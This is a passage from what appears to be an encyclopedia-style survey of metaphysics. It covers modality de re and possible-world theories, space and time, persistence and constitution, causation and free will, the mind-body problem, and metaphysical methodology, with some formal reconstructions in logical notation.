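The two formulas differ only in the scope of the box: in the first, necessity qualifies a proposition; in the second, it qualifies the way a property belongs to a thing.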
There are two types of modality de re. The first concerns the existence of things—of human beings, for example. If Sally, an ordinary human being, says, “I might not have existed”, almost everyone will take her to have stated an obvious truth. And if what she has said is indeed true, then she exists contingently. That is to say, she is a contingent being: a being who might not have existed. A necessary being, in contrast, is a being of which it is false that it might not have existed. Whether any objects are necessary beings is an important question of modal metaphysics. Some philosophers have gone so far to maintain that all objects are necessary beings, since necessary existence is a truth of logic in what seems to them to be the best quantified modal logic. (See Barcan 1946 for the first modern connection between necessary existence and quantified modal logic. Barcan did not draw any metaphysical conclusions from her logical results, but later authors, especially Williamson 2013 have.)
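The route from quantified modal logic to the conclusion that everything exists necessarily, alluded to in the parenthesis above, can be sketched as follows (a standard reconstruction, not a quotation of Barcan 1946):

```latex
% The Barcan formula and its converse:
\Diamond\,\exists x\,\varphi \;\rightarrow\; \exists x\,\Diamond\varphi
\qquad\qquad
\exists x\,\Diamond\varphi \;\rightarrow\; \Diamond\,\exists x\,\varphi

% In the simplest quantified modal logic, classical quantification theory
% proves that each thing exists:
\vdash\; \exists y\,(y = x)
% and the rule of necessitation, together with universal generalization,
% then yields
\vdash\; \forall x\,\Box\,\exists y\,(y = x)
% i.e., everything is a necessary being -- the "necessitist" thesis
% that Williamson (2013) defends.
```

Avoiding this conclusion while keeping the contingency of beings like Sally is one motivation for the more complicated “free” and variable-domain quantified modal logics.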
The second kind of modality de re concerns the properties of things. Like the existence of things, the possession of properties by things is subject to modal qualification. If Sally, who speaks English, says, “I might have spoken only French”, almost everyone will take that statement to be no less obviously true than her statement that she might not have existed. And if what she has said is indeed true, then “speaking English” is a property that she has only contingently or (the more usual word) only accidentally. Additionally there may be properties which some objects have essentially. A thing has a property essentially if it could not exist without having that property. Examples of essential properties tend to be controversial, largely because the most plausible examples of a certain object's possessing a property essentially are only as plausible as the thesis that that object possesses those properties at all. For example, if Sally is a physical object, as physicalists suppose, then it is very plausible for them to suppose further that she is essentially a physical object—but it is controversial whether they are right to suppose that she is a physical object. And, of course, the same thing can be said, mutatis mutandis, concerning dualists and the property of being a non-physical object. It would seem, however, that Sally is either essentially a physical object or essentially a non-physical object. And many find it plausible to suppose that (whether she is physical or non-physical) she has the property “not being a poached egg” essentially.
The most able and influential enemy of modality (both de dicto and de re) was W. V. Quine, who vigorously defended both the following theses. First, that modality de dicto can be understood only in terms of the concept of analyticity (a problematical concept in his view). Secondly, that modality de re cannot be understood in terms of analyticity and therefore cannot be understood at all. Quine argued for this latter claim by proposing what he took to be decisive counterexamples to theories that take essentiality to be meaningful. If modality de re makes any sense, Quine contended (1960: 199–200), cyclists must be regarded as essentially bipedal—for “Cyclists are bipedal” would be regarded as an analytic sentence by those who believe in analyticity. But mathematicians are only accidentally bipedal (“Mathematicians are bipedal” is not analytic by anyone's lights). What then, Quine proceeded to ask, of someone who is both a mathematician and a cyclist?—that person seems both essentially and only accidentally bipedal. Since this is incoherent, Quine thought that modality de re is incoherent.
Most philosophers are now convinced, however, that Quine's “mathematical cyclist” argument has been adequately answered by Saul Kripke (1972), Alvin Plantinga (1974) and various other defenders of modality de re. Kripke and Plantinga's defenses of modality are paradigmatically metaphysical (except insofar as they directly address Quine's linguistic argument). Both make extensive use of the concept of a possible world in defending the intelligibility of modality (both de re and de dicto). Leibniz was the first philosopher to use ‘possible world’ as a philosophical term of art, but Kripke's and Plantinga's use of the phrase is different from his. For Leibniz, a possible world was a possible creation: God's act of creation consists in his choosing one possible world among many to be the one world that he creates—the “actual” world. For Kripke and Plantinga, however, a possible world is a possible “whole of reality”. For Leibniz, God and his actions “stand outside” all possible worlds. For Kripke and Plantinga, no being, not even God, could stand outside the whole system of possible worlds. A Kripke-Plantinga (KP) world is an abstract object of some sort. Let us suppose that a KP world is a possible state of affairs (this is Plantinga's idea; Kripke says nothing so definite). Consider any given state of affairs; let us say, Paris being the capital of France. This state of affairs obtains, since Paris is the capital of France. By contrast, the state of affairs Tours being the capital of France does not obtain. The latter state of affairs does, however, exist, for there is such a state of affairs. (Obtaining thus stands to states of affairs as truth stands to propositions: although the proposition that Tours is the capital of France is not true, there nevertheless is such a proposition.) The state of affairs x is said to include the state of affairs y if it is impossible for x to obtain and y not to obtain. 
If it is impossible for both x and y to obtain, then each precludes the other. A possible world is simply a possible state of affairs that, for every state of affairs x, either includes or precludes x; the actual world is the one such state of affairs that obtains.
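Writing O(x) for “the state of affairs x obtains”, the definitions just given can be set out schematically; this is a reconstruction in standard modal notation, not Plantinga's own formulation:

```latex
% x includes y: x cannot obtain unless y obtains
x \text{ includes } y \;\equiv\; \Box \, (O(x) \rightarrow O(y))
% x precludes y: x and y cannot obtain together
x \text{ precludes } y \;\equiv\; \neg \Diamond \, (O(x) \wedge O(y))
% w is a possible world: w possibly obtains and is maximal
w \text{ is a possible world} \;\equiv\;
    \Diamond O(w) \;\wedge\; \forall x \, (w \text{ includes } x \;\vee\; w \text{ precludes } x)
% The actual world is the unique possible world w such that O(w).
```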
Using the KP theory we can answer Quine's challenge as follows. In every possible world, every cyclist in that world is bipedal in that world. (Assuming with Quine that necessarily cyclists are bipedal. Apparently he had not foreseen adaptive bicycles.) Nevertheless for any particular cyclist, there is some possible world where he (the same person) is not bipedal. Once we draw this distinction, we can see that Quine's argument is invalid. More generally, on the KP theory, theses about de re essential properties need not be analytic; they are meaningful because they express claims about an object's properties in various possible worlds.
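The invalidity can be displayed as a scope distinction. With the hypothetical predicate letters C for “is a cyclist” and B for “is bipedal” (introduced here only for illustration), Quine's premise and the conclusion his argument requires come apart as follows:

```latex
% De dicto (granted for the sake of argument):
% necessarily, all cyclists are bipedal
\Box \, \forall x \, (Cx \rightarrow Bx)
% De re (what Quine's argument requires):
% every cyclist is essentially bipedal
\forall x \, (Cx \rightarrow \Box \, Bx)
% The first does not entail the second: in another possible world,
% the same individual may fail to cycle and fail to be bipedal.
```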
We can also use the notion of possible worlds to define many other modal concepts. For example, a necessarily true proposition is a proposition that would be true no matter what possible world was actual. Socrates is a contingent being if there is some possible world such that he would not exist if that world were actual, and he has the property “being human” essentially if every possible world that includes his existence also includes his being human. Kripke and Plantinga have greatly increased the clarity of modal discourse (and particularly of modal discourse de re), but at the expense of introducing a modal ontology, an ontology of possible worlds.
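These definitions may be put schematically, quantifying over possible worlds; the predicates True, Exists, and F(x, w) are informal shorthand for “would be true/would exist/would be F if w were actual”, a sketch under the KP theory's assumptions:

```latex
% p is necessarily true: p would be true whichever world were actual
\Box p \;\equiv\; \forall w \, \mathit{True}(p, w)
% x is a contingent being: some world excludes x's existence
\mathit{Contingent}(x) \;\equiv\; \exists w \, \neg \mathit{Exists}(x, w)
% x has F essentially: no world includes x's existence without x's being F
\mathit{Essential}(x, F) \;\equiv\; \forall w \, (\mathit{Exists}(x, w) \rightarrow F(x, w))
```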
Theirs is not the only modal ontology on offer. The main alternative to the KP theory has been the ‘modal realism’ championed by David Lewis (1986). Lewis's modal ontology appeals to objects called possible worlds, but these “worlds” are concrete objects. What we call the actual world is one of these concrete objects, the spatiotemporally connected universe we inhabit. What we call “non-actual” worlds are other concrete universes that are spatiotemporally isolated from ours (and from each other). There is, Lewis contends, a vast array of non-actual worlds, an array that contains at least those worlds that are generated by an ingenious principle of recombination, a principle that can be stated without the use of modal language (1986: 87). For Lewis, moreover, “actual” is an indexical term: when I speak of the actual world, I refer to the world of which I am an inhabitant—and so for any speaker who is “in” (who is a part of) any world.
In the matter of modality de dicto, Lewis's theory proceeds in a manner that is at least parallel to the KP theory: there could be flying pigs if there are flying pigs in some possible world (if some world has flying pigs as parts). But the case is otherwise with modality de re. Since every ordinary object is in only one of the concrete worlds, Lewis must either say that each such object has all its properties essentially or else adopt a treatment of modality de re that is not parallel to the KP treatment. He chooses the latter alternative. Although Socrates is in only the actual world, Lewis holds, he has ‘counterparts’ in some other worlds, objects that play the role in those worlds that he plays in this world. If all Socrates' counterparts are human, then we may say that he is essentially human. If one of Hubert Humphrey's counterparts won (the counterpart of) the 1968 presidential election, it is correct to say of Humphrey that he could have won that election.
In addition to the obvious stark ontological contrast between the two theories, they differ in two important ways in their implications for the philosophy of modality. First, if Lewis is right, then modal concepts can be defined in terms of paradigmatically non-modal concepts, since ‘world’ and all of Lewis's other technical terms can be defined using only ‘is spatiotemporally related to’, ‘is a part of’ and the vocabulary of set theory. For Kripke and Plantinga, however, modal concepts are sui generis, indefinable or having only definitions that appeal to other modal concepts. Secondly, Lewis's theory implies a kind of anti-realism concerning modality de re. This is because there is no one relation that is the counterpart relation—there are rather various ways or respects in which one could say that objects in two worlds “play the same role” in their respective worlds. Socrates, therefore, may well have non-human counterparts under one counterpart relation and no non-human counterparts under another. And the choice of a counterpart relation is a pragmatic or interest-relative choice. But on the KP theory, it is an entirely objective question whether Socrates fails to be human in some world in which he exists: the answer must be Yes or No and is independent of human choices and interests.
Whatever one may think of these theories when one considers them in their own right (as theories of modality, as theories with various perhaps objectionable ontological commitments), one must concede that they are paradigmatically metaphysical theories. They bear witness to the resurgence of metaphysics in analytical philosophy in the last third of the twentieth century.
3.2 Space and Time
Long before the theory of relativity represented space and time as aspects of or abstractions from a single entity, spacetime, philosophers saw space and time as intimately related. (A glance through any dictionary of quotations suggests that the philosophical pairing of space and time reflects a natural, pre-philosophical tendency: “Had we but world enough, and time …”; “Dwellers all in time and space”.) Kant, for example, treated space and time in his Transcendental Aesthetic as things that should be explained by a single, unified theory. And his theory of space and time, revolutionary though it may have been in other respects, was in this respect typical of philosophical accounts of space and time. Whatever the source of the conviction that space and time are two members of a “species” (and the only two members of that species), they certainly raise similar philosophical questions. It can be asked whether space extends infinitely in every direction, and it can be asked whether time extends infinitely in either of the two temporal “directions”. Just as one can ask whether, if space is finite, it has an “end” (whether it is bounded or unbounded), one may ask of time whether, if it is finite, it had a beginning or will have an end or whether it might have neither, but rather be “circular” (be finite but unbounded). As one can ask whether there could be two extended objects that were not spatially related to each other, one can ask whether there could be two events that were not temporally related to each other. One can ask whether space is (a) a real thing—a substance—a thing that exists independently of its inhabitants, or (b) a mere system of relations among those inhabitants. And one can ask the same question about time.
But there are also questions about time that have no spatial analogues—or at least no obvious and uncontroversial analogues. There are, for example, questions about the grounds of various asymmetries between the past and the future—why is our knowledge of the past better than our knowledge of the future?; why do we regard an unpleasant event that is about to happen differently from the way we regard an unpleasant event that has recently happened?; why does causation seem to have a privileged temporal direction? There do not seem to be objective asymmetries like this in space.
There is also the question of temporal passage—the question whether the apparent “movement” of time (or the apparent movement of ourselves and the objects of our experience through or in time) is a real feature of the world or some sort of illusion. In one way of thinking about time, there is a privileged temporal direction marking the difference between the past, present, and future. A-theorists hold that time is fundamentally structured in terms of a past/present/future distinction. Times change from past to present to future, giving rise to passage. (The name ‘A-theorist’ descends from J.M.E. McTaggart's (1908) name for the sequence past/present/future, which he called the ‘A-series’.) Within the A-theory, we might further ask whether the past and future have the “same sort of reality” as the present. Presentist A-theorists, like Prior (1998), deny that the past or future have any concrete reality. Presentists typically think of the past and future as, at best, akin to abstract possible worlds—they are the way the world was or will be, just as possible worlds are ways the actual world could be. Other A-theorists, like Sullivan (2012), hold that the present is metaphysically privileged but deny that there is any ontological difference between the past, present, and future. More generally, A-theorists often incorporate strategies from modal metaphysics into their theories about the relation of the past and the future to the present.
According to B-theories of time, the only fundamental distinction we should draw is that some events and times are earlier or later relative to others. (These relations are called ‘B-relations’, a term also derived from McTaggart). According to the B-theorists, there is no objective passage of time, or at least not in the sense of time passing from future to present and from present to past. B-theorists typically maintain that all past and future times are real in the same sense in which the present time is real—the present is in no sense metaphysically privileged.
It is also true, and less often remarked on, that space raises philosophical questions that have no temporal analogues—or at least no obvious and uncontroversial analogues. Why, for example, does space have three dimensions and not four or seven? On the face of it, time is essentially one-dimensional and space is not essentially three-dimensional. It also seems that the metaphysical problems about space that have no temporal analogues depend on the fact that space, unlike time, has more than one dimension. For example, consider the problem of incongruent counterparts: those who think space is a mere system of relations struggled to explain our intuition that we could distinguish a world containing only a left hand from a world containing only a right hand. So it seems there is an intuitive orientation to objects in space itself. It is less clear whether the problems about time that have no spatial analogues are connected with the one-dimensionality of time.
Finally, one can raise questions about whether space and time are real at all—and, if they are real, to what extent (so to speak) they are real. Might it be that space and time are not constituents of reality as God perceives reality but nevertheless “well-founded phenomena” (as Leibniz held)? Was Kant right when he denied spatial and temporal features to “things as they are in themselves”?—and right to contend that space and time are “forms of our intuition”? Or was McTaggart's position the right one: that space and time are wholly unreal?
If these problems about space and time belong to metaphysics only in the post-Medieval sense, they are nevertheless closely related to questions about first causes and universals. First causes are generally thought by those who believe in them to be eternal and non-local. God, for example—both the impersonal God of Aristotle and the personal God of Medieval Christian, Jewish, and Muslim philosophy—is generally said to be eternal, and the personal God is said to be omnipresent. To say that God is eternal is to say either that he is everlasting or that he is somehow outside time. And this raises the metaphysical question of whether it is possible for there to be a being—not a universal or an abstract object of some other sort, but an active substance—that is everlasting or non-temporal. An omnipresent being is a being that does not occupy any region of space (not even the whole of it, as the luminiferous ether of nineteenth-century physics would if it existed), and whose causal influence is nevertheless equally present in every region of space (unlike universals, to which the concept of causality does not apply). The doctrine of divine omnipresence raises the metaphysical question whether it is possible for there to be a being with this feature. Ante res universals are said by some of their proponents (precisely those who deny that universals are constituents of particulars) to have no relations to space and time but “vicarious” ones: the ante res universal “whiteness” may be said to be present where each white particular is, but only in a way analogous to the way in which the number two is present where each pair of spatial things is. But it is doubtful whether this is a position that is possible for a metaphysician who says that a white thing is a bundle composed of whiteness and various other universals. 
Those who believe in the existence of in rebus universals are fond of saying, or have been in recent years, that these universals (‘immanent universals’ is a currently popular name for them) are “multiply located”—“wholly present” at each place at which the things that fall under them are present. And by this they certainly do not mean that whiteness is present in many different regions of space only vicariously, only as a number might be said to be present wherever there are things in that number, only in virtue of bearing the non-spatial relation “being had by” to a multitude of particulars each of which is present in a single region of space. All theories of universals, therefore, raise questions about how things in various ontological categories are related to space. And all these questions have temporal analogues.
3.3 Persistence and Constitution
Related to questions about the nature of space and time are questions about the nature of objects that take up space or persist through time, and these questions form yet another central theme in post-medieval metaphysics. Are some or all objects composed of proper parts? Must an object have proper parts in order to “fill up” a region of space—or are there extended simples? Can more than one object be located in exactly the same region? Do objects persist through change by having temporal parts?
Much work on persistence and constitution has focused on efforts to address a closely knit family of puzzles—the puzzles of coincidence. One such puzzle is the “problem of the statue and the lump”. Consider a gold statue. Many metaphysicians contend that there is at least one material object that is spatially co-extensive with the statue, a lump of gold. This is easily shown, they say, by an appeal to Leibniz's Law (the principle of the non-identity of discernibles). There is a statue here and there is a lump of gold here, and—if the causal story of the statue's coming to be is of the usual sort—the lump of gold existed before the statue. And even if God has created the statue (and perforce the lump) ex nihilo and will at some point annihilate the statue (and thereby annihilate the lump), they further argue, the statue and the lump, although they exist at exactly the same times, have different modal properties: the lump has the property “can survive radical deformation” and the statue does not. Or so these metaphysicians conclude. But it has seemed to other metaphysicians that this conclusion is absurd, for it is absurd to suppose (these others say) that there could be spatially coincident physical objects that share all their momentary non-modal properties. Hence, the problem: What, if anything, is the flaw in the argument for the non-identity of the statue and the lump?
A second puzzle in this family is the “problem of Tib and Tibbles”. Tibbles is a cat. Call his tail “Tail”. Call all of him but his tail “Tib”. Suppose Tail is cut off—or, better, annihilated. Tibbles still exists, for a cat can survive the loss of its tail. And it would seem that Tib will exist after the “loss” of Tail, because Tib lost no part. But what will be the relation between Tib and Tibbles? Can it be identity? No, that is ruled out by the non-identity of discernibles, for Tibbles will have become smaller and Tib will remain the same size. But then, once again, we seem to have a case of spatially coincident material objects that share their momentary non-modal properties.
Both these constitution problems turn on questions about the identities of spatially coincident objects—and, indeed, of objects that share all their (proper) parts. (A third famous problem of material constitution—the problem of the Ship of Theseus—raises questions of a different sort.) Some metaphysicians contend that the relation between the lump and the statue, on the one hand, and the relation between Tib and Tibbles, on the other, cannot be fully understood in terms of the concepts of parthood and (non-) identity, but require a further concept, a non-mereological concept, the concept of “constitution”: the pre-existent lump at a certain point in time comes to constitute the statue (or a certain quantity of gold or certain gold atoms that first constituted only the lump come to constitute them both); pre-existent Tib at a certain point in time comes to constitute Tibbles (or certain cat-flesh or certain molecules …). (Baker 2000 is a defense of this thesis.) Others contend that all the relations between the objects that figure in both problems can be fully analyzed in terms of parthood and identity. For a more thorough overview of the solutions to these puzzles and different theories of constitution in play, see Rea (ed.) 1997 and Thomson 1998.
3.4 Causation, Freedom and Determinism
Questions about causation form yet a fourth important category of issues in the “new” metaphysics. Of course, discussion of causes goes back to Ancient Philosophy, featuring prominently in Aristotle's Metaphysics and Physics. But Aristotle understood ‘cause’ in a much broader sense than we do today. In Aristotle's sense, a ‘cause’ or ‘aition’ is an explanatory condition of an object—an answer to a “why” question about the object. Aristotle classifies four such explanatory conditions—an object's form, matter, efficient cause, and teleology. An object's efficient cause is the cause which explains change or motion in an object. With the rise of modern physics in the seventeenth century, interest in efficient causal relations became acute, and it remains so today. And when contemporary philosophers discuss problems of causation, they typically mean this sense.
One major issue in the metaphysics of causation concerns specifying the relata of causal relations. Consider a mundane claim: an iceberg caused the Titanic to sink. Does the causal relation hold between two events: the event of the ship hitting the iceberg and the event of the ship sinking? Or does it hold between two sets of states of affairs? Or does it hold between two substances, the iceberg and the ship? Must causal relations be triadic or otherwise polyadic? For example, one might think that we are always required to qualify a causal claim: the iceberg, rather than the captain's negligence, was causally responsible for the ship’s foundering. And can absences feature in causal relations? For example, does it make sense to claim that a lack of lifeboats was the cause of a third-class passenger's death?
We might further ask whether causal relations are objective and irreducible features of reality. Hume famously doubted this, theorizing that our observations of causation were nothing more than observations of constant conjunction. For example, perhaps we think icebergs cause ships to sink only because we always observe ship-sinking events occurring after iceberg-hitting events and not because there is a real causal relation that holds between icebergs and foundering ships.
Contemporary metaphysicians have been attracted to other kinds of reductive treatments of causation. Some—like Stalnaker and Lewis—have argued that causal relations should be understood in terms of counterfactual dependencies (Stalnaker 1968 and Lewis 1973). For example, an iceberg's striking the ship caused its sinking at time t if and only if in the nearest possible worlds where the iceberg did not strike the ship at time t, the ship did not sink. Others have argued that causal relations should be understood in terms of instantiations of laws of nature. (Davidson (1967) and Armstrong (1997) each defend this view albeit in different ways.) All of these theories expand on an idea from Hume's Treatise in attempting to reduce causation to different or more fundamental categories. (For a more complete survey of recent theories of causation, see Paul and Hall 2013.)
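The counterfactual treatment can be sketched using the counterfactual conditional (“if it were the case that …, it would be the case that …”); roughly, in Lewis's version:

```latex
% Event e causally depends on event c, where O(c) abbreviates "c occurs":
O(c) \;\Box\!\!\rightarrow\; O(e)
\quad\text{and}\quad
\neg O(c) \;\Box\!\!\rightarrow\; \neg O(e)
% c is then a cause of e iff there is a chain of events
% c, d_1, \dots, d_n, e in which each member causally depends
% on its predecessor.
```

The detour through chains of dependence, rather than dependence alone, is what allows the analysis to handle cases where causation is transitive but direct counterfactual dependence fails.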
Debates about causation and laws of nature further give rise to a related set of pressing philosophical questions—questions of freedom. In the seventeenth century, celestial mechanics gave philosophers a certain picture of a way the world might be: it might be a world whose future states were entirely determined by the past and the laws of nature (of which Newton's laws of motion and law of universal gravitation served as paradigms). In the nineteenth century the thesis that the world was indeed this way came to be called ‘determinism’. The problem of free will can be stated as a dilemma. If determinism is true, there is only one physically possible future. But then how can anyone ever have acted otherwise? For, as Carl Ginet has said (1990: 103), our freedom can only be the freedom to add to the actual past; and if determinism holds, then there is only one way that the given—the actual—past can be “added to”. But if determinism does not hold, if there are alternative physically possible futures, then which one comes to pass must be a mere matter of chance. And if it is a mere matter of chance whether I lie or tell the truth, how can it be “up to me” whether I lie or tell the truth? Unless there is something wrong with one of these two arguments, the argument for the incompatibility of free will and determinism or the argument for the incompatibility of free will and the falsity of determinism, free will is impossible. The problem of free will may be identified with the problem of discovering whether free will is possible—and, if free will is possible, the problem of giving an account of free will that displays an error in one of (or both) these arguments.
Van Inwagen (1998) defends the position that, although the modern problem of free will has its origin in philosophical reflections on the consequences of supposing the physical universe to be governed by deterministic laws, the problem cannot be evaded by embracing a metaphysic (like dualism or idealism) that supposes that agents are immaterial or non-physical. This leads into our next and final sample of topics from the “new” metaphysics.
3.5 The Mental and Physical
If it is natural both to pair and to oppose time and space, it is also natural to pair and to oppose the mental and the physical. The modern identity theory holds that all mental events or states are a special sort of physical event or state. The theory is parsimonious (among its other virtues) but we nevertheless exhibit a natural tendency to distinguish the mental and the physical. Perhaps the reason for this is epistemological: whether our thoughts and sensations are physical or not, the kind of awareness we have of them is of a radically different sort from the kind of awareness we have of the flight of a bird or of a flowing stream, and it seems to be natural to infer that the objects of the one sort of awareness are radically different from the objects of the other. That the inference is logically invalid is (as is so often the case) no barrier to its being made. Whatever the reason may be, philosophers have generally (but not universally) supposed that the world of concrete particulars can be divided into two very different realms, the mental and the material. (As the twentieth century passed and physical theory rendered “matter” an increasingly problematical concept, it became increasingly common to say “the mental and the physical”.) If one takes this view of things, one faces philosophical problems that modern philosophy has assigned to metaphysics.
Prominent among these is the problem of accounting for mental causation. If thoughts and sensations belong to an immaterial or non-physical portion of reality—if, for example, they are changes in immaterial or non-physical substances—how can they have effects in the physical world? How, for example, can a decision or act of will cause a movement of a human body? How, for that matter, can changes in the physical world have effects in the non-physical part of reality? If one's feeling pain is a non-physical event, how can a physical injury to one's body cause one to feel pain? Both questions have troubled “two realm” philosophers—or ‘dualists’, to give them their more usual name. But the former has troubled them more, since modern physics is founded on principles that assert the conservation of various physical quantities. If a non-physical event causes a change in the physical world—dualists are repeatedly asked—does that not imply that physical quantities like energy or momentum fail to be conserved in any physically closed causal system in which that change occurs? And does that not imply that every voluntary movement of a human body involves a violation of the laws of physics—that is to say, a miracle?
A wide range of metaphysical theories have been generated by the attempts of dualists to answer these questions. Some have been less than successful for reasons that are not of much intrinsic philosophical interest. C. D. Broad, for example, proposed (1925: 103–113) that the mind affects the body by momentarily changing the electrical resistance of certain synapses in the brain (thus diverting various current pulses, which literally follow the path of least resistance, into paths other than those they would have taken). And this, he supposed, would not imply a violation of the principle of the conservation of energy. But it seems impossible to suppose that an agent could change the electrical resistance of a physical system without expending energy in the process, for to do this would necessitate changing the physical structure of the system, and that implies changing the positions of bits of matter on which forces are acting (think of turning the knob on a rheostat or variable resistor: one must expend energy to do this). If this example has any philosophical interest it is this: it illustrates the fact that it is impossible to imagine a way for a non-physical thing to affect the behavior of a (classical) physical system without violating a conservation principle.
The various dualistic theories of the mind treat the interaction problem in different ways. The theory called ‘dualistic interactionism’ does not, of itself, have anything to say about the problem—although its various proponents (Broad, for example) have proposed solutions to it. ‘Occasionalism’ simply concedes that the “local” counterfactual dependence of the behavior of a physical system on a non-physical event requires a miracle. The theory of pre-established harmony, which substitutes “global” for local counterfactual dependence of voluntary physical movements on the mental states of agents, avoids problems with conservation principles—but secures this advantage at a great price. (Like occasionalism, it presupposes theism, and, unlike occasionalism, it entails either that free will does not exist or that free will is compatible with determinism.) ‘Epiphenomenalism’ simply denies that the mental can affect the physical, and contents itself with an explanation of why the mental appears to affect the physical.
In addition to these dualistic theories, there are monistic theories, theories that dissolve the interaction problem by denying the existence of either the physical or the non-physical: idealism and physicalism. (Present-day philosophers for the most part prefer the term ‘physicalism’ to the older term ‘materialism’ for reasons noted above.) Most current work in the philosophy of mind presupposes physicalism, and it is generally agreed that a physicalistic theory that does not simply deny the reality of the mental (that is not an “eliminativist” theory), raises metaphysical questions. Such a theory must, of course, find a place for the mental in a wholly physical world, and such a place exists only if mental events and states are certain special physical events and states. There are at least three important metaphysical questions raised by these theories. First, granted that all particular mental events or states are identical with particular physical events or states, can it also be that some or all mental universals (‘event-types’ and ‘state-types’ are the usual terms) are identical with physical universals? Secondly, does physicalism imply that mental events and states cannot really be causes (does physicalism imply a kind of epiphenomenalism)? Thirdly, can a physical thing have non-physical properties—might it be that mental properties like “thinking of Vienna” or “perceiving redly” are non-physical properties of physical organisms? This last question, of course, raises a more basic metaphysical question, ‘What is a non-physical property?’ And all forms of the identity theory raise fundamental metaphysical questions, ontological questions, questions like, ‘What is an event?’ and ‘What is a state?’.
4. The Methodology of Metaphysics
As is obvious from the discussion in Section 3, the scope of metaphysics has expanded beyond the tidy boundaries Aristotle drew. So how should we answer our original question? Is contemporary metaphysics just a compendium of philosophical problems that cannot be assigned to epistemology or logic or ethics or aesthetics or to any of the parts of philosophy that have relatively clear definitions? Or is there a common theme that unites work on these disparate problems and distinguishes contemporary metaphysics from other areas of inquiry?
These issues concerning the nature of metaphysics are further connected with issues about the epistemic status of various metaphysical theories. Aristotle and most of the Medievals took it for granted that, at least in its most fundamental aspects, the ordinary person's picture of the world is “correct as far as it goes”. But many post-Medieval metaphysicians have refused to take this for granted. Some of them, in fact, have been willing to defend the thesis that the world is very different from, perhaps radically different from, the way people thought it was before they began to reason philosophically. For example, in response to the puzzles of coincidence considered in Section 3.3, some metaphysicians have maintained that there are no objects with proper parts. This entails that composite objects—tables, chairs, cats, and so on—do not exist, a somewhat startling view. And as we saw in Section 3.1, other metaphysicians have been happy to postulate the reality of concrete merely possible worlds if this posit makes for a simpler and more explanatorily powerful theory of modality. Perhaps this contemporary openness to “revisionary” metaphysics is simply a recovery of or a reversion to a pre-Aristotelian conception of a “permissible metaphysical conclusion”, a conception that is illustrated by Zeno's arguments against the reality of motion and Plato's Allegory of the Cave. But no matter how we classify it, the surprising nature of many contemporary metaphysical claims puts additional pressure on practitioners to explain just what they are up to. They raise questions of the methodology of metaphysics.
One attractive strategy for answering these questions emphasizes the continuity of metaphysics with science. On this conception, metaphysics is primarily or exclusively concerned with developing generalizations from our best-confirmed scientific theories. For example, in the mid-twentieth century, Quine (1948) proposed that the “old/intermediate” metaphysical debate over the status of abstract objects should be settled in this way. He observed that if our best scientific theories are recast in the “canonical notation of (first-order) quantification” (in sufficient depth that all the inferences that users of these theories will want to make are valid in first-order logic), then many of these theories, if not all of them, will have as a logical consequence the existential generalization on a predicate \(F\) such that \(F\) is satisfied only by abstract objects. It would seem, therefore, that our best scientific theories “carry ontological commitment” to objects whose existence is denied by nominalism. (These objects may not be universals in the classical sense. They may, for example, be sets.) Take for example the simple theory, ‘There are homogeneous objects, and the mass of a homogeneous object in grams is the product of its density in grams per cubic centimeter and its volume in cubic centimeters’. A typical recasting of this theory in the canonical notation of quantification is:
\(\exists x\, Hx \mathbin{\&} \forall x\,(Hx \rightarrow Mx = Dx \times Vx)\)
(‘\(Hx\)’: ‘\(x\) is homogeneous’; ‘\(Mx\)’: ‘the mass of \(x\) in grams’; ‘\(Dx\)’: ‘the density of \(x\) in grams per cubic centimeter’; ‘\(Vx\)’: ‘the volume of \(x\) in cubic centimeters’.) A first-order logical consequence of this “theory” is
\(\exists x\exists y\exists z(x = y \times z)\)
That is: there exists at least one thing that is a product (at least one thing that, for some \(x\) and some \(y\) is the product of \(x\) and \(y\)). And a product must be a number, for the operation “product of” applies only to numbers. Our little theory, at least if it is recast in the way shown above, is therefore, in a very obvious sense, “committed” to the existence of numbers. It would seem, therefore, that a nominalist cannot consistently affirm that theory. (In this example, the role played by ‘the predicate F’ in the abstract statement of Quine's “observation” is played by the predicate ‘…=…×…’.)
Quine's work on nominalism inspired a much broader program for approaching ontological questions. According to “neo-Quineans”, questions about the existence of abstract objects, mental events, objects with proper parts, temporal parts, and even other concrete possible worlds are united to the extent that they are questions about the ontological machinery required to account for the truth of our best-confirmed theories. Still, many questions of the new and old metaphysics are not questions of ontology. For example, many participants in the debate over causation are not particularly worried about whether causes and effects exist. Rather, they want to know “in virtue of what” something is a cause or effect. Few involved in the debate over the mental and physical are interested in the question whether there are mental properties (in some sense or other). Rather, they are interested in whether mental properties are “basic” or sui generis—or whether they are grounded, partially or fully, in physical properties.
Is there a unified methodology for metaphysics more broadly understood? Some think the task of the metaphysician is to identify and argue for explanatory relations of various kinds. According to Fine (2001), metaphysicians are in the business of providing theories of which facts or propositions ground other facts or propositions, and which facts or propositions hold “in reality”. For example, a philosopher might hold that tables and other composite objects exist, but think that facts about tables are completely grounded in facts about the arrangements of point particles or facts about the state of a wave function. This metaphysician would hold that there are no facts about tables “in reality”; rather, there are facts about arrangements of particles. Schaffer 2010 proposes a similar view, but holds that metaphysical grounding relations hold not between facts but between entities. According to Schaffer, the fundamental entity/entities should be understood as the entity/entities that grounds/ground all others. On Schaffer's conception we can meaningfully ask whether a table is grounded in its parts or vice versa. We can even theorize (as Schaffer does) that the world as a whole is the ultimate ground for everything.
Another noteworthy approach (Sider 2012) holds that the task of the metaphysician is to “explain the world” in terms of its fundamental structure. For Sider, what unites (good) metaphysics as a discipline is that its theories are all framed in terms that pick out the fundamental structure of the world. For example, according to Sider we may understand ‘causal nihilism’ as the view that causal relations do not feature in the fundamental structure of the world, and so the best language for describing the world will eschew causal predicates.
It should be emphasized that these ways of delimiting metaphysics do not presuppose that all of the topics we've considered as examples of metaphysics are substantive or important to the subject. Consider the debate about modality. Quine (1953) and Sider (2012) both argue from their respective theories about the nature of metaphysics that aspects of the debate over the correct metaphysical theory of modality are misguided. Others are skeptical of the debates about composition or persistence through time. So theories about the nature of metaphysics might give us new resources for criticizing particular first-order debates that have historically been considered metaphysical, and it is common practice for metaphysicians to regard some debates as substantive while adopting a deflationist attitude about others.
5. Is Metaphysics Possible?
It may also be that there is no internal unity to metaphysics. More strongly, perhaps there is no such thing as metaphysics—or at least nothing that deserves to be called a science or a study or a discipline. Perhaps, as some philosophers have proposed, no metaphysical statement or theory is either true or false. Or perhaps, as others have proposed, metaphysical theories have truth-values, but it is impossible to find out what they are. At least since the time of Hume, there have been philosophers who have proposed that metaphysics is “impossible”—either because its questions are meaningless or because they are impossible to answer. The remainder of this entry will be a discussion of some recent arguments for the impossibility of metaphysics.
